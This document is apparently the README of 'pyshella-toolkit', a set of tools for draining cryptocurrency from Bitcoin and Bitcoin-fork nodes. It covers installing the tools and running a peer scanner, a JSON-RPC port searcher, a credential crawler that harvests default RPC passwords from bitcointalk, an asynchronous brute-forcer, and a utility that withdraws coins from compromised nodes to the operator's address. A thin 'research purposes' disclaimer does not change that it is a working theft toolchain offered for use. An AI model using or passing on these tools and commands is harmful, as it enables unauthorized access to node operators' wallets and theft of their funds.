This is simple toolkit for Bitcoin or Bitcoin forks , which contains
cli scripts such as peers-scanner, jsonrpc-searcher,
jsonrpc-bruter, coins-withdrawal.
This set of scripts allows you to find peers with the JSON-RPC port open to the outside, followed by a bruteforce attack and withdrawal the coins.
Disclaimer: This toolkit was created for research purposes,
use it at your own peril and risk. The author of this toolkit
is not responsible for your actions.
Donate me if you like it:
bitcoin -> bc1qqkr72aemz59aawxf74gytrwuw4m9mj20t7e7df
ethereum -> 0xB3e5b643cFB9e2565a3456eC7c7A73491A32e31F
mkdir -p ~/pyshella-toolkit/wordlists && mkdir ~/pyshella-toolkit/logs
git clone https://github.com/mkbeh/pyshella-toolkit
cd pyshella-toolkit/
pip3.7 install wheel
python3.7 setup.py bdist_egg --exclude-source-files
python3.7 -m easy_install --install-dir ~/.local/lib/python3.7/site-packages --prefix=$HOME/.local dist/<package>
# NOTE: if error - try previously (setup yours path)
export PYTHONPATH=~/.local/lib/python3.7/site-packagessudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4
echo "deb [ arch=amd64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.0.list
sudo apt-get update
sudo apt-get install -y mongodb-org
mkdir -p /data/db
echo "mongodb-org hold" | sudo dpkg --set-selections
echo "mongodb-org-server hold" | sudo dpkg --set-selections
echo "mongodb-org-shell hold" | sudo dpkg --set-selections
echo "mongodb-org-mongos hold" | sudo dpkg --set-selections
echo "mongodb-org-tools hold" | sudo dpkg --set-selections# Start MongoDB
mongod
# Connect to the instance
mongo
# Use database
use admin
# Create the user administrator
db.createUser({user: "admin", pwd: "admin", roles: ["root"]})
# Re-start the MongoDB instance with access control
db.adminCommand({ shutdown: 1})
# Exit from mongo cli
exit
# -- Run mongo daemon --
mongod --auth -f /etc/mongod.conf
# -- Check connection --
mongo --host <ip:20777> -u "admin" --authenticationDatabase "admin" -p
git clone https://github.com/mkbeh/pyshella-toolkit
cd pyshella-toolkit/
chmod +x toolkit.sh
mkdir -p ~/pyshella-toolkit
# Set your data to the sections `program` in `toolkit.conf`.
vi toolkit.conf
--- IMPORTANT NOTE ---
# if you do not want to run a spider -
# add your dictionaries to the directory
# ~/pyshella-toolkit/wordlists on host.
# This directory is shared between the host
# and the container.
# Next build docker image.
docker build -t pyshella-toolkit:0.56.30 .Available modes to launch the container:
- DEBUG - the running container will output data from the log file in real time for all utilities from the toolkit with errors and success data.
- BATTLE - without output data from the log file in real time.
Crawler modes:
- ACTIVATE - will activate crawler , which will crawl bitcointalk.org ANN section for searching default credentials , then created 2 files with RPC users and RPC passwords.
- INACTIVATE - will use dictionaries from
toolkit.conf.
# -- Docker run examples for each supporting mode --
# -- DEBUG:
docker run --name <coin_name> -v ~/pyshella-toolkit:/pyshella-toolkit -e "ENV=DEBUG" --network host pyshella-toolkit:<version>
# -- BATTLE:
docker run -itd --name <coin_name> -v ~/pyshella-toolkit:/pyshella-toolkit -e "ENV=BATTLE" --network host pyshella-toolkit:<version>
# EDIT THIS
docker run -v ~/pyshella-toolkit:/pyshella-toolkit/shared -e "ENV=DEBUG" -e "CRAWLER=ACTIVATE" --network host pyshella-toolkit:<version>
# -- NOTE --
If your database is on a remote host, then
option `--network` with value `host` can be omitted.File with log are located by host path ~/pyshella-toolkit/logs/
Crawler which searching default rpc credentials in each topic of section ANN.
Important note: This process may take more than a few
hours, please be patient.
cd btt_spider
scrapy crawl creds_crawlerThe peers scanner scans the network for available peers and
writes them to a file. For new peers, old ones are blacklisted.
usage: pyshella-peers-scanner [-h] -nU [-b] [-i] -mU -n
optional arguments:
-h, --help show this help message and exit
-nU , --node-uri Node URI.
-b , --ban-time The time(days) which will be banned each peer (by
default 14 days).
-i , --interval Interval(secs) between call cycles for new peers (by
default 60 secs).
-mU , --mongo-uri MongoDB uri.
-n , --coin-name Name of cryptocurrency.
-----------------------------------------------------------------------------
Usage example: pyshella-peers-scanner -nU <node_uri> -mU <mongo_uri> -n <coin_name>
Scanner which discovers Bitcoin/forks JSON-RPC on peers.
usage: pyshella-jsonrpc-searcher [-h] -n NAME [-mU URI] [-cT SECS] [-rT SECS]
[-bT SECS] [-hS NUM] [-pS NUM] [-v BOOL]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB URI. Default:
mongodb://root:toor@localhost:27017
-cT SECS Timeout between hosts block cycles.
-rT SECS Time to wait for a response from the server after
sending the request.
-bT SECS Delay between block cycles.
-hS NUM The number of hosts that will be processed
simultaneously.
-pS NUM The number of ports that will be processed
simultaneously for each host.
-v BOOL Activate verbose mode. Will show all found headers.
-----------------------------------------------------
Usage example: pyshella-jsonrpc-searcher -n Bitcoin -bT 1 -hS 1 -pS 200 -v True
Bitcoin/fork JSON-RPC bruter. Based on asyncio.
usage: pyshella-jsonrpc-bruter [-h] -n NAME [-mU URI] -l SINGLE/FILE -p
SINGLE/FILE [-b ORDER] [-t NUM] [-rT SECS]
[-cT SECS]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB URI. Default:
mongodb://root:toor@localhost:27017
-l SINGLE/FILE, --logins SINGLE/FILE
Single login or file with logins.
-p SINGLE/FILE, --passwords SINGLE/FILE
Single password or file with passwords.
-b ORDER, --brute-order ORDER
The order in which the brute force process will occur.
Where H - hosts, L - logins, P - passwords. Default:
HLP. Examples: HLP, LPH, PHL, etc.
-t NUM, --threads NUM
The number of coroutines that will be asynchronous in
bruteforce process.
-rT SECS, --read-timeout SECS
Time to wait for a response from the server after
sending the request.
-cT SECS, --cycle-timeout SECS
Timeout between getting new data for brute.
----------------------------------------------------------------------------------------------
Usage example:
-> pyshella-jsonrpc-bruter --help
-> pyshella-jsonrpc-bruter -n Bitcoin -t 20 -l <logins_file> -p <pwds_file> -b HLP
Utility which withdrawal crypto currency from bruted JSON-RPC.
usage: pyshella-coins-withdrawal [-h] -n NAME -mU URI -a ADDR [-i SECS]
optional arguments:
-h, --help show this help message and exit
-n NAME, --coin-name NAME
Name of cryptocurrency.
-mU URI, --mongo-uri URI
MongoDB uri.
-a ADDR, --withdrawal-address ADDR
The address to which the coins will be sent.
-i SECS, --interval SECS
Timeout after coins withdrawal from all the peers that
were collected in the database at the moment.
-----------------------------------------------------------------------------------------------------------------------
Usage example: pyshella-coins-withdrawal -n Bitcoin -mU mongodb://root:toor@localhost:27017 -a <withdrawal_addr> -i 300